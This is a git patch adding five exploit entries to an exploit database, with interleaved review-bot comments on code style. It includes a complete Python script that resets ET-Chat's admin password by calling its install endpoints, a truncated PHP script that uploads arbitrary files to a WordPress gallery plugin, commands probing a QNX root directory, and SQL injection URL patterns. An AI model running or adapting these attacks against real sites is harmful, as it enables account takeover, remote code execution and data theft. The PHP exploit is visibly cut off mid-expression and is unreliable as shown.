From 73b5663d00d601cceabb0e3ab8c4143fba69501a Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 29 Dec 2015 05:02:26 +0000
Subject: [PATCH] DB: 2015-12-29 5 new exploits
---
 files.csv | 5 +++++
 platforms/ios/remote/39114.txt | 9 +++++++++
 platforms/linux/local/39112.txt | 24 ++++++++++++++++++++++++
 platforms/multiple/remote/39115.py | 26 ++++++++++++++++++++++++++
 platforms/php/webapps/39111.php | 19 +++++++++++++++++++
 platforms/php/webapps/39113.txt | 11 +++++++++++
 6 files changed, 94 insertions(+)
 create mode 100755 platforms/ios/remote/39114.txt
 create mode 100755 platforms/linux/local/39112.txt
 create mode 100755 platforms/multiple/remote/39115.py
 create mode 100755 platforms/php/webapps/39111.php
 create mode 100755 platforms/php/webapps/39113.txt
diff --git a/files.csv b/files.csv
index 844cd3de2..b9ee1da13 100755
--- a/files.csv
+++ b/files.csv
@@ -35363,3 +35363,8 @@ id,file,description,date,author,platform,type,port
 39108,platforms/php/webapps/39108.txt,"POSH 3.1.x 'addtoapplication.php' SQL Injection Vulnerability",2014-02-26,"Anthony BAUBE",php,webapps,0
 39109,platforms/php/webapps/39109.txt,"WordPress Relevanssi Plugin 'category_name' Parameter SQL Injection Vulnerability",2014-03-04,anonymous,php,webapps,0
 39110,platforms/php/webapps/39110.txt,"Cory Jobs Search 'cid' Parameter SQL Injection Vulnerability",2014-03-05,Slotleet,php,webapps,0
+39111,platforms/php/webapps/39111.php,"WordPress Premium Gallery Manager Plugin Arbitrary File Upload Vulnerability",2014-03-06,eX-Sh1Ne,php,webapps,0
+39112,platforms/linux/local/39112.txt,"QNX Phgrafx File Enumeration Weakness",2014-03-10,cenobyte,linux,local,0
+39113,platforms/php/webapps/39113.txt,"Professional Designer E-Store 'id' Parameter Multiple SQL Injection Vulnerabilities",2014-03-08,"Nawaf Alkeraithe",php,webapps,0
+39114,platforms/ios/remote/39114.txt,"Apple iOS <= 4.2.1 'facetime-audio://' Security Bypass Vulnerability",2014-03-10,"Guillaume Ross",ios,remote,0
+39115,platforms/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass Vulnerability",2014-03-09,IRH,multiple,remote,0
diff --git a/platforms/ios/remote/39114.txt b/platforms/ios/remote/39114.txt
new file mode 100755
index 000000000..7094be2d1
--- /dev/null
+++ b/platforms/ios/remote/39114.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/66108/info
+
+Apple iOS is affected by a security-bypass vulnerability.
+
+Successfully exploiting this issue may allow an attacker to bypass certain security warnings. This may aid in further attacks.
+
+These issues affect Apple iOS versions prior to 7.1.
+
+ 
\ No newline at end of file
diff --git a/platforms/linux/local/39112.txt b/platforms/linux/local/39112.txt
new file mode 100755
index 000000000..8d8f4f639
--- /dev/null
+++ b/platforms/linux/local/39112.txt
@@ -0,0 +1,24 @@
+source: www.securityfocus.com/bid/66098/info
+
+QNX Phgrafx is prone to a file-enumeration weakness.
+
+An attacker can exploit this issue to enumerate the files present in the system's root directory; this may aid in further attacks.
+
+QNX 6.5.0 SP1, 6.5.0, 6.4.1, 6.3.0, and 6.2.0 are vulnerable; other versions may also be affected.
+
+$ id
+uid=100(user) gid=100
+
+# directory /root/.ph exists:
+$ /usr/photon/bin/phgrafx -d /root/.ph
+load_display_conf(): No such file or directory
+
+# file /root/.profile exsts:
+$ /usr/photon/bin/phgrafx -d /root/.profile
+/root/.profile: opendir(): Not a directory
+load_display_conf(): Not a directory
+
+# /root/doesnotexist does not exist:
+$ /usr/photon/bin/phgrafx -d /root/doesnotexist
+/root/doesnotexist: opendir(): No such file or directory
+load_display_conf(): No such file or directory
\ No newline at end of file
diff --git a/platforms/multiple/remote/39115.py b/platforms/multiple/remote/39115.py
new file mode 100755
index 000000000..5fc838709
--- /dev/null
+++ b/platforms/multiple/remote/39115.py
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/66149/info
+
+ET - Chat is prone to a security bypass vulnerability.
+
+An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.
+
+ET - Chat 3.0.7 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/env python
+__author__ = 'IRH'
+print "Example: et-chat.py http://et-chat.com/chat"
+
+import urllib
+import sys
+
+url = sys.argv[1]
+url1 = url+"/?InstallIndex"
+url2 = url+"/?InstallMake"
+
+checkurl = urllib.urlopen(url1)
+
+if checkurl.code == 200 :
+ urllib.urlopen(url2)
+ print "Password Was Reseted!! Enjoy ;)"
+else:
+ print "Site is not Vulnerability"
diff --git a/platforms/php/webapps/39111.php b/platforms/php/webapps/39111.php
new file mode 100755
index 000000000..9d95bd55b
--- /dev/null
+++ b/platforms/php/webapps/39111.php
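Review bot: The file is committed as a .py, but its first eight added lines (`+source: http://www.securityfocus.com/bid/66149/info` through the blank line before `+#!/usr/bin/env python`) are uncommented advisory prose, so the interpreter raises a SyntaxError on line 1 before the shebang or any import is reached; prefixing each of those lines with `# ` keeps the advisory text in the file without breaking the module. The `print "..."` statements and `urllib.urlopen` are Python 2 only while the shebang is the generic `#!/usr/bin/env python`, so the header should say so, e.g. `# Requires Python 2 (print statement, urllib.urlopen)`. As a point of style, `__author__` and the usage `print` sit above `import urllib` / `import sys`, which reverses the usual imports-first layout.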
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/66044/info
+
+Premium Gallery Manager plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks may also possible.
+
+"@$uploadfile",
+'folder'=>'/wp-content/plugins/Premium_Gallery_Manager/uploadify/'));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+?>
diff --git a/platforms/php/webapps/39113.txt b/platforms/php/webapps/39113.txt
new file mode 100755
index 000000000..dfa295ee9
--- /dev/null
+++ b/platforms/php/webapps/39113.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/66100/info
+
+E-Store is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+E-Store 1.0 and 2.0 are vulnerable; other versions may also be affected.
+
+http://www.example.com/page.php?id=[SQL Injection]
+
+http://www.example.com/news.php?id=[SQL Injection]
\ No newline at end of file
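Review bot: The hunk header declares 19 added lines but only 13 `+` lines are present, and `+"@$uploadfile",` opens mid-expression with no `<?php` tag, no `$ch` initialisation and no array key visible above it, so the file as shown here cannot be checked for syntax; presumably the span from the opening tag through the `=>` that precedes `"@$uploadfile"` was dropped as markup when the patch was rendered, and the commit should be reviewed against the raw file rather than this page. Whatever precedes the open tag is printed verbatim by PHP, so once the file is viewed intact the advisory header would be clearer inside a `/* ... */` comment after `<?php` than as bare text before it.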